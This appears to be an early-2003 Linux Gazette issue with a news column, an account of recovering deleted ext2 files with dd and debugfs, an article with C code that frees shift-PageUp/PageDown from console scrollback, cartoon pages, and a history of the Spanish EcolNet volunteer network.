LinuxSecurity.com has reported that despite the availability of fixes attackers are still compromising servers with well known attacks. The article has tips on improving security and security awareness. Some interesting links from Slashdot:

• Using Your iPod Under Linux
• ATI cards on Linux.
• Rivals Sony and Matsushita agree to jointly develop a version of Linux for their consumer electronics products.
• Lawrence Lessig explains the different effects of copyright on books and e-books.

Listings courtesy Linux Journal. See LJ's Events page for the latest goings-on.

Consumer Electronics Show	January 9-12, 2003 Las Vegas, NV http://www.cesweb.org/
LinuxWorld Conference & Expo	January 21-24, 2003 New York, NY http://www.linuxworldexpo.com/
O'Reilly Bioinformatics Technology Conference	February 3-6, 2003 San Diego, CA http://conferences.oreilly.com/
Game Developers Conference	March 4-8, 2003 San Jose, CA http://www.gdconf.com/
SXSW	March 7-11, 2003 Austin, TX http://www.sxsw.com/interactive
CeBIT	March 12-19, 2003 Hannover, Germany http://www.cebit.de/
4th USENIX Symposium on Internet Technologies and Systems	March 26-28, 2003 Seattle, WA http://www.usenix.org/events/
PyCon DC 2003	March 26-28, 2003 Washington, DC http://www.python.org/pycon/
AIIM	April 7-9, 2003 New York, NY http://www.advanstar.com/
SD West	April 8-10, 2003 Santa Clara, CA http://www.sdexpo.com/
COMDEX Chicago	April 15-17, 2003 Chicago, IL http://www.comdex.com/chicago/
Real World Linux Conference and Expo	April 29-30, 2003 Toronto, Ontario http://www.realworldlinux.com
USENIX First International Conference on Mobile Systems, Applications, and Services (MobiSys)	May 5-8, 2003 San Francisco, CA http://www.usenix.org/events/
USENIX Annual Technical Conference	June 9-14, 2003 San Antonio, TX http://www.usenix.org/events/
CeBIT America	June 18-20, 2003 New York, NY http://www.cebit-america.com/
The Fourth International Conference on Linux Clusters: the Linux HPC Revolution 2003	June 18-20, 2003 Las Vegas, NV http://www.linuxclustersinstitute.org/Linux-HPC-Revolution
O'Reilly Open Source Convention	July 7-11, 2003 Portland, OR http://conferences.oreilly.com/
12th USENIX Security Symposium	August 4-8, 2003 Washington, DC http://www.usenix.org/events/
LinuxWorld Conference & Expo	August 5-7, 2003 San Francisco, CA http://www.linuxworldexpo.com

iCanProgram

Spaces are still available for the iCanProgram course. iCanProgram began a year ago, offering online programmer training courses with a "no fee in return for a Cancer Research donation" format. Over the course of 2002 more than 1500 students have participated.

GFDD

Debian Weekly News reported on the 'stable' launch of GNUtemberg! Free Documentation Database, or GFDD. The GFDD is a free database for free documentation, providing services such as indexing, translation management, information on official publishing, document ratings, statistics and search.

Galuna S.R.L.

Galuna S.R.L. aims at supporting and improving Linux for Romanian users. The company translated major parts of GNOME desktop environment and helps new users migrate from Microsoft products to Linux, increasing productivity while reducing costs and software piracy rate which is very high in Romania.

To help clients benefit from open-source software advantages at high quality standards, Galuna offers both standard and custom solutions. Visit www.galuna.ro for presentations of Linux advantages and available desktop applications.

IBM Ships New Linux Ready eServer Systems

IBM has announced that it is shipping Linux ready IBM eServer pSeries systems. Equipped with POWER4 processors, IBM claims the new eServer system costs substantially less than a comparably configured Itanium 2 based system from Hewlett-Packard.

rpmseek.com - New rpm search engine

The new Linux portal www.rpmseek.com claims to offer users of the Linux operating system a convenient search engine for rpm packages. The packages can be searched by various criterions, such as package name, file name, distribution, keywords, dependencies or files that a package contains. Dependecies between packages are resolved by cross references.

For every rpm package there are numerous detailed informations collected, links to different mirror servers are listed for the download in geographically arranged order. Another highlight is the classification of all rpm packages into categories. This way, a special software type or functionality can be found by browsing the tree structure of the categories. The site also aims to offer a range of documentation and discussion groups.

Debian

The Debian Project has updated the current stable release (Woody) to Debian GNU/Linux 3.0 updated (r1). This update has involved the acceptance and rejection of some packages. The total list of changes for both the regular and non-US branches can be viewed online

Debian Weekly News reported that apt-get.org is now up and running. It maintains a list of unofficial APT repositories.

Debian Weekly News also highlighted two resources which would be of some use to those customising Debian. Martin Sjögren has made available scripts for building CD images based on the new debian-installer. This is of use in putting together small CD images. Also of interest is Create your first Debian Package. Clemens Lee's new Mini-HOWTO entitled " How to Create Your First Debian Package", which describes how to create a Debian package for installation on one's own computer, rather than for inclusion into the official Debian archives.

DesktopLinux has published an interview Colin Walters of the Debian Desktop subproject

DebianPlanet have published an article describing the process of downgrading from Sarge to Woody with Debian.

Mandrake

In the past month, MandrakeSoft has publicised financial difficulties that could threaten the future of the business. The company has appealed for more users to contribute financially through the purchase of Mandrake products, or by investing directly in the company. It is also hoped that the introduction of commercial licences will help generate larger revenue streams, though Mandrakesoft is at pains to emphasise that this does not represent a retreat from Free Software.

Rock

ROCK Linux 1.5.20 has been released.

Slackware

Slackware 8.1 has recently been reviewed by Unix Review and by Distrowatch.

SuSE

SuSE Linux has announced that the German city of Schwäbisch Hall (population 36,000) will build its IT infrastructure entirely on SuSE Linux - replacing a more costly Windows installation. The town will deploy SuSE Linux on IBM Intel-based servers as well as up to 400 PCs - saving the city an estimated amount of more than one hundred thousand Euro over the Windows installation.

Xandros Desktop

DistroWatch has published a review of Xandros Desktop 1.0.

ActiveState PureMessage: email protection

ActiveState Corp., a producer of email gateway filtering systems, has released PureMessage 3.0 (formerly PerlMx), an update of its anti-spam, anti-virus, and policy compliance solution. PureMessage 3.0 provides IT administrators with new features including a web-based administration console, enhanced spam identification and management flexibility, optional end user quarantine management, next generation anti-spam heuristics, and the McAfee anti-virus engine. The product is aimed at mid to large sized organisations.

SCO Update and UnixWare 7.1.3

The SCO Group has announced the launch of SCO Update Service, a new program that is claimed to make the upgrade process for SCO operating systems more efficient and less costly. The service is available for SCO Linux 4.0, UnixWare 7.1.3 and will be available for SCO OpenServer 5.0.7 when it ships early next year.

The Update Service simplifies and streamlines the process of deploying new technology and keeping deployed systems up-to-date. This service provides electronic notification and delivery of operating system changes, gives the system administrator control of the upgrade process and helps customers accurately budget for the cost of system upgrades.

Farpointer

Farpointer Technologies has announced a new automated session management tool for the Apache server. The company's iConductor server module interacts with HTML files to automatically implement session tracking via any URL. In addition, iConductor manages simple key/values as well as complex documents such as Web Services requests and replies. These features save a significant amount of developer time in building Internet-based applications. A free trial version of iConductor and an online demonstration are available online.

CylantSecure free for personal use

Cylant, a provider of host-based intrusion prevention systems for the Linux server platform, has announced that it is offering the newest version of CylantSecure (2.0.2) free for personal use.

ProjectForum

ProjectForum provides a solution for flexible workgroup collaboration and coordination of projects over the web. It can be used for project planning, todo lists, design notes, task assignments, meeting notes, problem reports, team discussions, collecting feedback, research, brainstorming and more. Version 1.1 (the first public release) is now available, with versions for Linux, as well as Windows, MacOS X, and FreeBSD.

ActiveState Updates Perl Development Portfolio

ActiveState has announced new releases of its Perl tools and language distribution: Perl Dev Kit (PDK) 5.0, Visual Perl 1.7, and ActivePerl 5.8. The Perl Dev Kit features tools for building and deploying Perl applications. Visual Perl is the Perl plug-in for Visual Studio .NET. ActivePerl is ActiveState's quality-assured distribution of Perl, available for Linux, Solaris, and Windows.

Fast Hardware Backup of Big IDE Drives

Arco Data Protection Systems, a provider of low cost IDE disk mirroring (RAID 1) hardware, has announced the release of The DupliDisk3. DupliDisk3 facilitates maintenance up-to-the-minute backups of data and software. The DupliDisk3 supports the Windows, LINUX , Macintosh and DOS operating systems and works by creating an exact bootable replica of your hard drive. The software is designed to handle drives as large as 131 Petabytes (131,072 Terabytes) and can provide copy speeds up to 48 Gigabytes per hour (800 Mbytes per minute).

Mick is LG's News Bytes Editor.

Born some time ago in Ireland, Michael is currently working on a PhD thesis in the Department of Mechanical Engineering, University College Dublin. The topic of this work is the use of Lamb waves in nondestructive testing. GNU/Linux has been very useful in this work, and Michael has a strong interest in applying free software solutions to other problems in engineering. When his thesis is completed, Michael plans to take a long walk.

...making Linux just a little more fun!

An Undeletion Experience By C.E.C. Artime and J.A. Baro

We describe an attempt of recovering data unadvertedly deleted on a ext2 filesystem. Aware that the course of events was far from desirable, we are committed that our readers will not make the same mistakes and, in order to illustrate the bunch of things that one can learn during a crisis, we detail the whole story.

Prelude: the disaster spells

The arena

Hardware

Two boxes, called Fish and Bell. Fish is a Sun E250. Bell is a Pentium 3 (450 MHz). They are in the same Ethernet subnetwork.

Software

Bell runs Debian GNU/Linux 3.0r0 after a painless upgrade from 2.2r7. Kernel is Linux 2.4.18.

Fish also runs a Debian 3.0r0, port Sparc64. A recent upgrade from 2.2r7 led to a unique problem: XFree does not work for normal users (it does for root). Kernel is Linux 2.4.18-SMP.

All filesystems are ext2.

How we buggered it up

On Fish, Xfree works for root, but not for normal users.
Rationale: either a problem with permissions or user configuration files.
Solution: let us add a user and copy root's dot-files to its home directory:

root@fish# adduser judas
Enter new UNIX password:
Retype new UNIX password:
root@fish# cp --recursive /root/.[a-zA-Z]* /home/judas
root@fish# chown --recursive judas:judas /home/judas/.*

[Did you spot the difference between regexp arguments for cp and chown?]

After enough trail & error, the X problem is finally solved; it is about time to remove the user.
While trying to speed up the procedure a bit, thorough study of a terse man page reveals an appealing option:

root@fish# deluser --remove-all-files judas

Cha-ching! Enters disaster! The unfortunate option makes deluser search the entire disk looking for files owned by judas and erasing them!

Contents of /home disappeared.
Two minutes later, we unmounted its corresponding device (/dev/sda8).

Back-up

First attempt

First cares involve taking a copy of the raw bytes inside the doomed device.
There is no room in Fish, so let us make a copy onto Bell's hard drive:

root@fish# ftp bell
ftp> put '|dd if=/dev/sda8' fishbackup

In fact, this step was not so easy due to a problem with the net: transmission of big files is interrupted after a while. The file must be split. Partition /dev/sda8 is size 10142 MiB.
Resorting to the factor tool of GNU shellutils:

root@fish# factor 10142
10142: 2 11 461

This led us to an appropriate size for each chunk of device.

Secure tunnelling

Instead FTP, we used the OpenSSL suite for the next step.
First we interchange passwords in order to use batch mode:

root@fish# ssh-keygen 
artime@bell$ ssh-keygen
root@fish# scp /root/.ssh/identity.pub artime@bell:/home/artime/.ssh/authorized.keys
root@fish# scp artime@bell:~/.ssh/identity.pub ~/.ssh/authorized.keys

Let us execute this script in Fish:

#!/bin/sh
for i in $(seq 0 460)
do
  dd if=/dev/sda8 bs=$((2*11*1024)) skip=$i of=fula
  scp --batch fula artime@bell:~/fiback.$i
done

Just join the pieces in Bell:

for i in $(seq 0 460)
do cat fiback.$i >> fiback.raw
done

Equivalently we could do the same in one step by executing in Fish:

#!/bin/sh
for i in $(seq 0 460)
do
  dd if=/dev/sda8 bs=$((2*11*1024)) skip=$i | ssh artime@bell "cat >> fiback.raw"
done

Seeking lost data

We can resort to the Linux Ext2fs undeletion mini-HOWTO, by Aaron Crane; the Ext2fs undeletion of directory structures mini-HOWTO, by Tomas Ericsson; the recover program by Tom Pycke; Torsten Werner's patch for debugfs working on i386.

Lazy attempt

Recover is a tool for recovering individual files. As in our case we have suddenly lost hundreds of files, it seems this is not the best choice to begin with. The most direct way is using Werner's debugfs patch; we already have a copy of the damaged filesystem stored in a i386 box, so we can use the binary found at twerner.debian.org:

artime@bell$ ./debugfs fishback.raw
debugfs> restore
debugfs> quit
artime@bell$ mkdir mnt
artime@bell$ mount -t ext2 -o loop fishback.raw mnt
artime@bell$ ls -l mnt

We find no files there! It seems we unmounted /dev/sda8 a little too late. As T. Werner indicates on his page, his tool can only recover files that still have a name.

It pays reading

Crane's undeletion howto

This tool we pick in The Linux Documentation Project taught us how to find the inodes (more or less, the locations) of lost files and how to recover them with the dump command of debugfs. We finish with a lot of assorted files in the same directory, but they are just a small subset of the deleted ones. As mentioned before, a thorough, file by file recovery scheme as indicated in this HOWTO is unfeasible in our case.

Ericsson's directory undeletion howto

Here we learnt how to tell between deleted files from directories. We followed the indications.
The script in section 7 was in need for some further adaptation to our version of debugfs

#!/bin/sh
awk '{ print "mi <" $1 ">\n"\
             "\n\n\n\n\n\n\n"\
             "0\n"\
             "1\n"\
             "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }'

Anyway, we fail to find the directory names and proceed to section 8. So we must look elsewhere.

Man pages

A last chance was

$ man debugfs

where we found the command rdump, unmentioned in the howtos. Applying the following script to the directory inodes located in lsdel.out of section 6 of Ext2fs Undeletion of Directory Structures mini-HOWTO:

#!/bin/sh
awk '{ print "rdump <" $1 "> folders\n" }'

most directories are recovered into the directory folders. But unnamed! So finally we have to individually assign two hundred folders to users by looking their contents! Even after that, we miss some files, notably an e-mail box. Let us try a quest by hand:

$ strings fishback.raw | grep -B1 -A99 "To: lisistrata" > lisistrata.mbox

Epilogue

Further things we would like to outline.

RTFM

Magnetic tapes

Regexps

The use of regular expressions in shell commands is very dangerous, especially when dealing with dot-files. Perhaps the superuser root should use a shell with limited (rather than "extended") regular expression support. We are considering esh.

PDA

This article was mostly written with an Agenda VR3, a rather unique free software PDA, in a beach of Gran Canaria.

C.E.C. Artime is a GNU fan and a free software advocator since 2000.

J.A. Baro is a Linux user and a Perl hacker since 1996.

...making Linux just a little more fun!

I Broke the Console Barrier By Stephen Bint

When I began using Linux I noticed that most Linux text editors are rubbish, having little or no mouse support, no shift-selection and no menus or file open dialogs. So I thought I could make a contribution, by writing an editor which had all the features we have come to associate with DOS editors, for the Linux console. Why shouldn't the better OS have editors which are at least as good?

So I searched for a library that would give me a colour text-mode interface to both platforms and I found Slang and curses. Neither were satisfactory. In order to provide an interface to a huge list of platforms, many features possible at the Linux console were disabled. Also, they were so big there was no prospect of customising them for my own needs and bundling the modified versions with my own sources. Out of frustration I set out to write my own.

I set myself the target of producing an interface with the widest possible range of ctrl- and alt- key combinations, a function to report the state of shift, ctrl and alt keys, full mouse reporting (including movement) and direct access to a screen array of EGA-style character-colour pairs. I hoped to produce something small and simple enough for programmers to bundle with their own source, so they could modify it if they wish and distribute with confidence.

The Mouse

Programming for the mouse was relatively easy. Under DOS, I just used int86 and Ralf Brown's Interrupt List. Under Linux, I struggled for a while and eventually mastered the gpm mouse driver, which has pretty good docs and demo programs.

The Screen

Finding out how to output colour text to the Linux screen was more of a struggle. I was saved by an article at Linux Gazette called "So You Like Color!!!". I was shocked at what it said.

Unlike DOS, under which characters and colours are written directly to video memory as byte pairs, the Linux screen is refreshed by using fwrite to write to stdout! Instead of a colour being written with each character, the output colour must be changed whenever a character is a different colour to the one written before it. Changing the output colour involves writing an 11-byte string to stdout.

Consequently, screen refresh is very slow under Linux. I did what I could to speed it up. I keep a duplicate screen buffer which is updated as the screen is refreshed. Comparing this to the screen buffer, I refresh only parts of the screen which have changed. Even so, screen refresh takes twenty times as long under Linux as it does under DOS.

It is possible to access video memory in recent versions of Linux, by opening /dev/vcsa as a file. (see man vcs for details) There are two reasons not to do this. One is that only programs run by the superuser are allowed to do it. The second is that only the US ASCII character set is supported. At least with fwrite, the local character set is respected, which is important because Linux is an international thing, from its friendly welcome screen to its big, warm heart.

I found out how to show, hide and position the text cursor by examining the Slang sources and by using an excellent program bundled with Slang, called untic. Untic reads the terminfo database and translates it into human-readable form. (The terminfo database contains the command strings to write to stdout to perform control operations on any terminal.)

There was one little niggle. Under Linux, box-drawing characters are not part of the default character set. ASCII values which produce boxes under DOS produce funny foreign letters under Linux unless you send a string to stdout to switch to the alt character set. Switching to that charset permanently was not an option. I wanted the library to be international like Linux, supporting international character sets, so what to do?

I decided to use the high bit of the colour byte as a box bit. Programmers wishing to draw boxes would have to set the box bit in the colour for any characters they wish to be shown as box characters. This meant that blinking text would not be available, because the high bit is otherwise used for that, but I was happy. I never liked blinking text anyway.

The Keyboard

Interpreting keyboard events on either platform is a giant screaming nightmare on stilts. Under DOS, the BIOS scancodes are so illogically allocated, they might as well be random numbers. Under Linux, the terminal has to be specially prepared and then, the function keys generate strings of bytes which need to be converted to scancodes through a lookup table.

It was almost inconceivable to convert Linux key events to DOS, or vice versa. I decided instead, to produce a pure key function, which would report a key value which is unaffected by control or alt, but will be shifted if shift is pressed. Programmers wishing to use a ctrl- or alt-key combination for a hot key could examine the keyboard status word seperately.

The DOS Keyboard

You might hope that a two-byte BIOS scancode would use the high byte as a key ID which never varies and the low byte for an ASCII value which depends on whether shift, control or alt are pressed. Unfortunately, because of a need to maintain compatability with the old XT keyboard, the high byte varies as much much as the low byte. What is worse, different keys react differently to control and alt. To avoid a time-consuming switch block, I produced a tangle of "if" tests to sieve the identities out of ctrl'd and alt'd scancodes.

Then I found that holding down shift reverses the sense of the numlock under DOS, but not Linux. I had to complicate my key purifier still further to undo that stupidity, so numlock means numbers, no matter what. So DOS was conquered and I faced the horror of the Linux keyboard.

The Linux Keyboard

In its default state, the Linux keyboard is far from suitable for an interactive program. The fgetc() function does not return until return is pressed, then it returns a whole string at once, so moving the cursor with arrows can't work. It echoes characters to the screen and ctrl-z, ctrl-q and ctrl-s all generate interrupts. It's a nightmare.

I had hoped I could avoid using fgetc() and slip the keyboard into raw mode (pure scancodes), but the gpm mouse driver offered me no choice. It provides a single function to read events from both keyboard and mouse, and the keyboard part uses fgetc(stdin). There is a mouse-only polling function, but I couldn't make it work.

I am glad of that now, because I have realised since that fgetc() receives high-level keycodes which are likely to be the same on foreign keyboards, where the layout and probably the scancodes would be different. I resigned myself to translating strings of bytes into scancodes as a necessity and it turned out to be easier than dealing with BIOS scancodes under DOS had been.

I found out how to set up the terminal by examining the Slang sources. You use a function called tcsetattr() to set flags and values in a terminal control structure. So I fixed the keyboard to return characters immediately without echo and to treat ctrl-z, ctrl-q and ctrl-s as ordinary keys.

I still had no kbhit() function, nor any way to read the shift state (whether ctrl, alt or shift are pressed). Google turned up an article at Linux Gazette called "Taming the Linux Keyboard", which gave me both those functions, full source code.

The Final Trial

Still one bugbear remained. It may seem trivial to you but it was everything to me. It seemed insurmountable and I don't mind admitting, it nearly broke me.

You know how on DOS editors you can select text by holding down shift while using cursor-movement keys, including page up and page down? Well under Linux, shift-PageUp and shift-PageDown are reserved for a pointless function called scrollback. That means applications receive nothing from fgetc() when shift-PageUp/Down are pressed. The kernel spirits these keys away and your program never sees them.

But that is not the worst of it by a long chalk. After weeks of brain-busting work I found out at the final furlong, that if a user tries to select text with shift-PageUp, half my lovely colour text screen disappears - scrolled back!

There was no way I could release my library now. I felt like I had read a thousand-page novel and found the last page missing. I went round and round in circles of man pages and info files and searched the net to no avail. Then I noticed that the shift_state() function I got from that article I mentioned earlier, used a function called ioctl() to work its magic.

I used "apropos ioctl" to search the man pages and found one called "console_ioctls". There I discovered that ioctl() is the Linux equivalent of a DOS interrupt call. The same page gave a full list of low-level system calls and a warning from a kernel programmer, never to use these because they are not guaranteed and are subject to change in future versions of the kernel.

But we all know we can ignore kernel programmers when they say things like that. They are just denying responsibility, like when Scotty tells Captain Kirk it's going to take twice as long as it really will.

In the list I found one to change the functions associated with keys - including PageUp and PageDown. It involved filling a struct with three integers, to indicate which table, which key and which command to assign. The problem was, there were no docs telling me what these numbers should be, to disable scrollback for shift-PageUp.

Further research turned up the kbd package, which contains great docs and a bunch of utilities for changing the key mapping. You can dump the current mapping to stdout by running dumpkeys. Here is an excerpt from my dumpkeys output. Notice that it only gives me one of the three numbers I need - the keycode.

keycode 103 = Up              
	alt	keycode 103 = KeyboardSignal  
keycode 104 = Prior
	shift	keycode 104 = Scroll_Backward
keycode 105 = Left            
	alt	keycode 105 = Decr_Console    
keycode 106 = Right           
	alt	keycode 106 = Incr_Console    
keycode 107 = Select          
keycode 108 = Down            
keycode 109 = Next            
	shift	keycode 109 = Scroll_Forward
keycode 110 = Insert          

If you redirect the output into a text file, you can edit it and pass it to loadkeys to alter the mapping. Experiments revealed that you can delete most of the file - only leaving the keys you want to change. So I reduced it to two lines:

shift	keycode 104 = Scroll_Backward 
shift	keycode 109 = Scroll_Forward

and changed the current functions to the ones for those keys without shift pressed:

shift	keycode 104 = Prior
shift	keycode 109 = Next

I called the file kmap and ran "loadkeys kmap". Then I tried my test program and found that scrollback had been disabled - exactly the result I was looking for. I knew now that it was possible. A peek at the source for loadkeys revealed that it used the ioctl I had found, to change the key functions, but I still did not know what numbers to use.

I had no choice but to use cunning. I found out that loadkeys has a -m option, to produce a source file, which contains tables of 256 values. I ran "loadkeys -m kmap" and found it produced one table with 254 null values and two non-null. Counting elements I found that the non-null elements were numbered 104 and 109 - the key codes in my kmap file. The values in the table had to be the values of the "Prior" and "Next" commands.

I also saw that this table had a number. I tried changing "shift" to "control" in one of the lines in kmap and got two tables, one for shift and one for control. In both cases the shift table was table number 1. Along with the actual values in the table, I had my three numbers.

To disable scrollback and scroll forward and make shift-PageUp/Down into ordinary keys, you must save the existing values, then change them and install an exit routine to restore them to normal function afterwards.

If you want to disable any key, such as the console switching keys for example, you will need to mess about like I did with "loadkeys -m" to find the numbers you are looking for.

This function changes a key's action and saves the old one in an integer you pass in by reference (written for gcc):

(text version of all listings)

#include <sys/ioctl.h>
#include <linux/kd.h>
#include <linux/keyboard.h>
#include <stdio.h>

int set_kb_entry( unsigned short table, unsigned short keycode, 
                  unsigned short value, unsigned short *oldvalue ) {

   struct kbentry ke;

   ke.kb_table = table;
   ke.kb_index = keycode;

/* Get old value, return error if table or keycode are duff */
   if( ioctl( fileno(stdin), KDGKBENT, &ke ) )
      return -1;

/* Unless oldvalue ptr is NULL, save old value to restore later */
   if( oldvalue ) *oldvalue = ke.kb_value;

/* The new action for this key */
   ke.kb_value = value; 

/* Do the business, return error if value is duff */
   if( ioctl( fileno(stdin), KDSKBENT, &ke ) )
      return -1;

   return 0;
   }

To use the above function to disable scrollback and restore it on exit:

#include <stdlib.h>

/* Old key action values will be stored in these */
unsigned short scroll_forward = 0;
unsigned short scroll_backward = 0;

/* The magic numbers gleaned from dumpkeys and loadkeys -m */
#define SHIFT_TABLE          1
#define PAGE_UP_KEYCODE    104
#define PAGE_DOWN_KEYCODE  109
#define PAGE_UP_ACTION     0x0118 /* Prior */
#define PAGE_DOWN_ACTION   0x0119 /* Next  */


/* Restore default funcs for shift-PageUp and shift-PageDown */
static void restore_scrollback() {

   if( scroll_backward )
      set_kb_entry( SHIFT_TABLE, PAGE_UP_KEYCODE, 
                    scroll_backward, 0 );

   if( scroll_forward )
      set_kb_entry( SHIFT_TABLE, PAGE_DOWN_KEYCODE, 
                    scroll_forward, 0 );
   }


/* Liberate shift-PageUp and shift-PageDown for normal use */
int disable_scrollback() {

   if( set_kb_entry( SHIFT_TABLE, PAGE_UP_KEYCODE, 
                     PAGE_UP_ACTION, &scroll_backward ) )
      return -1;

   if( set_kb_entry( SHIFT_TABLE, PAGE_DOWN_KEYCODE, 
                     PAGE_DOWN_ACTION, &scroll_forward ) )
      return -1;

   atexit( restore_scrollback );

   return 0;
   }

Return of the Jedi

So I emerged from the dark underworld of the Linux console, prizes in hand, triumphant. I have made it possible for programmers to write console apps which behave exactly the same under DOS and Linux and (I think) secured my place in legend.

And you know what? I never did write that text editor. I can't because I am homeless and I was lucky to get access to a computer long enough to do this little thing. Perhaps that is where you come in.

Linux is a virgin territory, about to be colonized by the people of India and Africa. They can't afford flash computers that can run X, so they need console apps. Now even those of you who don't have Linux installed can help them.

Linux needs pioneers to carve out the infrastructure before the first big wave of settlers can move in. Those settlers will need configuration dialogs for common apps like Apache and for common filters like grep. They will need a good text editor, with a right-click cut-copy-paste menu.

Programmers who mean to produce these tools will need a widget library and especially, a file Open/Save dialog. They would benefit from a well-written string array class with cut-copy-paste functions, provided separately to be used in various, competing text editors.

The perfect editor wouldn't have many features, but would have a simple facility for adding functions to its menus. It would be set up so that any fool could write a C++ function which takes a pointer to an editor as an argument and add that function to the editor's menu, just by adding a single line to main(). Programmers could swap C++ editor functions with eachother and we would be on course to the ultimate editor.

Will you be a pioneer? If no-one bothers, I fear that Linux may fall and we may all end up the helpless playthings of the evil Darth Gates. So I am hoping you will pick up my fallen standard. You may be our last, our only hope. Good luck.

May the Source be with you.

ctio.zip (41.7kb)
ctio.tar (150kb)

Credits

Slang, by John E. Davis. Slang is easy to rob because it is well-written. I learned how to init the keyboard and got most of the command strings for the screen from the Slang sources. I got other command strings by using the untic program that comes with it. But the best thing about Slang is what enables Midnight Commander to run in a telnet window. Anyone who has ever had to fix a web server remotely will know, it's a beautiful thing.

So You Like Color !!! By Pradeep Padala (LG #65). This article got me started on the Linux console screen.

Taming The Linux Keyboard By Petar Marinov (LG #76). My shift_status() and key_awaits() functions are modified versions of shift_state() and kbhit() given away with this article.

Ralf Brown, Patron Saint of DOS programmers

Stephen is a homeless Englishman who lives in a tent in the woods. He eats out of bins and smokes cigarette butts he finds on the road. Though he once worked for a short time as a C programmer, he prefers to describe himself as a "keen amateur".

...making Linux just a little more fun!

HelpDex By Shane Collinge

These cartoons are scaled down to minimize horizontal scrolling. To see a panel in all its clarity, click on it.

Recent HelpDex cartoons are at Shane's web site, www.shanecollinge.com, on the Linux page.

Part computer programmer, part cartoonist, part Mars Bar. At night, he runs around in a pair of colorful tights fighting criminals. During the day... well, he just runs around. He eats when he's hungry and sleeps when he's sleepy.

...making Linux just a little more fun!

Ecol By Javier Malonda

These cartoons were made for es.comp.os.linux (ECOL), the Spanish USENET newsgroup for Linux. The strips are drawn in Spanish and then translated to English by the author. Text commentary on this page is by LG Editor Iron. Your browser has shrunk the images to conform to the horizontal size limit for LG articles. For better picture quality, click on each cartoon to see it full size.

These cartoons are copyright Javier Malonda. They may be copied, linked or distributed by any means. However, you may not distribute modifications. If you link to a cartoon, please notify Javier.

...making Linux just a little more fun!

EcolNet and the escomposLinux.org project By Javier Malonda

The (not so) brief story.

Why should I be interested in this article?

This is an article about the birth, growth and everyday life of an Internet community. Why is this Internet community so special? See it for yourself.

• It has its very own network. This translates into an independent community, only dependent on bandwidth providers (our ISPs). Everything else is maintained by its members.
• It's quite big, involving people all around a country, Spain in this case. It's interesting to see how people can coordinate, even while live far away from each other.
• It's a non profit member-defrayed organization. Each member pays for his own box, his Internet connection, and is responsible for the services he has chosen to offer.
• It's a pro-Open Source organization, basically a Linux thing. The group hosts many Open-Source projects, providing the needed infrastructure to its members.
• It's open to everyone who has something to offer to help spread the Open Source gospel. The infrastucture is run by just a bunch of volunteers who pay costs out of their pockets, but everyone is invited to contribute in any way: writing code, writing documentation, promoting Open Source in any way, etc...

We're using cable and DSL Internet connections. Most likely this community model could be run on more modest bandwidth connections. Of course it can be run on better connections, thus offering new possibilities. It's all a matter of imagination and motivation. As for the boxes, some of them are pretty old for today's standards, but they deal very well with their everyday duties, showing the true power of Open Source and being a remarkable example of what can be done with Linux and hardware that someone else would consider a piece of junk.

Following EcolNet's example, bigger or smaller communities could be built on the same basis. Keep on reading and see what we have come up with. Maybe it will fire your imagination. I hope it does :)

Some history

escomposLinux stands for a "short" name of the newsgroups hierarchy es.comp.os.Linux. As you can easily note, this is the root of all Linux newsgroups in Spanish and the other languages spoken in Spain. "es" refers to Spain, in contrast with "esp" which hosts all the Spanish speaking groups in general.

The es.comp.os.Linux newsgroup was founded in 1996, promoted by Pablo Saratxaga. In those days, there was no newsgroup to discuss about Linux in Spanish, not even in the esp.* top-level domain noted before. Later, in 1999, and due to the incredible increase of traffic, a split of the original es.comp.os.Linux was proposed, voted and approved, so four more specific groups were created:

• es.comp.os.Linux.instalacion: Installation and configuration
• es.comp.os.Linux.programacion: Programming in Linux
• es.comp.os.Linux.redes: Networking under Linux
• es.comp.os.Linux.misc: Stuff that didn't fit in any other place

This current year saw the birth of es.comp.os.Linux.anuncios (announcements) , though it doesn't hold much traffic as of now.

In the year 2000, some active es.comp.os.Linux users created a first version of the escomposLinux web page, hosted at Linux-es.com. Not long after that, a group of five ecol users, bought the escomposLinux.org domain and the web page got moved to its actual location, at www.escomposLinux.org. Those Linux users who were especially active at the newsgroups, received web hosting space and FTP access, so they could have a place to display all their Linux documentation and personal projects. Everyone interested, can access to a @escomposLinux.org mail account. I'd like to note that, in Spain, things were hard even in the year 2000, and having an email account was not as easy as it is nowadays.

These "Five Good Men" started the project writing a manifesto about the guidelines to be followed. All initial the costs were assumed by those volunteers, who never asked for financial help. Step by step, the escomposLinux.org project gets bigger and bigger, as new services are added and more people gets involved. Luckily, DSL become relatively affordable. On October 2001, all the services provided at the time are moved to machines run and maintained by regular es.comp.os.Linux.* users. This is when the escomposLinux.org project becomes EcolNet.

What's EcolNet?

Technically, EcolNet is the escomposLinux.org network, a bunch of computers spread all over the country. EcolNet is run, administered and defrayed by volunteers who have in common their passion for Linux and the regular use of the es.comp.os.Linux.* groups. We are not "37337 gurus". We enjoy learning how Linux works. Plus we are happy to help the Linux community.

What was the motivation behind EcolNet? Basically, the terrible management by the Spanish ISPs of the newsgroups, including es.comp.os.Linux.*. Slow services, lost messages... We thought we could do better. Also, the first place that hosted escomposLinux.org was very resctrictive, data storage was expensive and FTP was limited. As soon as we thought we could take care of the services we needed, we moved escomposLinux.org to our home servers.

What's EcolNet current goal? When someone wants to start a project (say a little program, a big one, a documentation project, a game) he doesn't have at hand all the tools he might need. Usually, you'd have your code at sourceforge, maybe freshmeat, an IRC channel at openprojects.org, an FTP in some university lost in some lost place of the planet, and so on. With EcolNet, s/he who starts a project has all the support he may need, and everything centralized: www space, FTP, IRC channel, etc. That's basically what EcolNet offers. But of course, EcolNet is much more than that. EcolNet is a bunch of people who have become good friends enjoying Linux and its philosophy.

Where are the servers located? A map showing these EcolNet machines' location is shown here. You can see the machine's name, its IP, the volunteer's name, their email address and what kind of Internet connection the box has: [Click for image].

This is a nice example of what can be done with Dia. You can find more details about this diagram in the end of the article if you are interested.

So the idea is easy: we take a few computers with a relatively decent Internet connection and create a network providing services. Adding resources and allocating necesities and responsabilities, we have achieved a network which works on small computers and basic DSL Internet connections, depending just on ourselves and our capability to keep the boxes working. EcolNet also allows us to experiment the management of a Linux server, having fun with it, and puts on our shoulders the responsability to keep things working, which is sometimes a bit stressing. But that's what the root life is like, isn't it? ;)

What services do you run at EcolNet?

The list is quite long. EcolNet offers to the Linux community in Spain (completely non profit) the following services:

• Electronic mail: POP3 and Webmail access.
• Webpage hosting: Actualized via rsync. Anyone who has something to offer involving Linux has a place at the ecol project.
• Anonymous FTP: To handle large stuff.
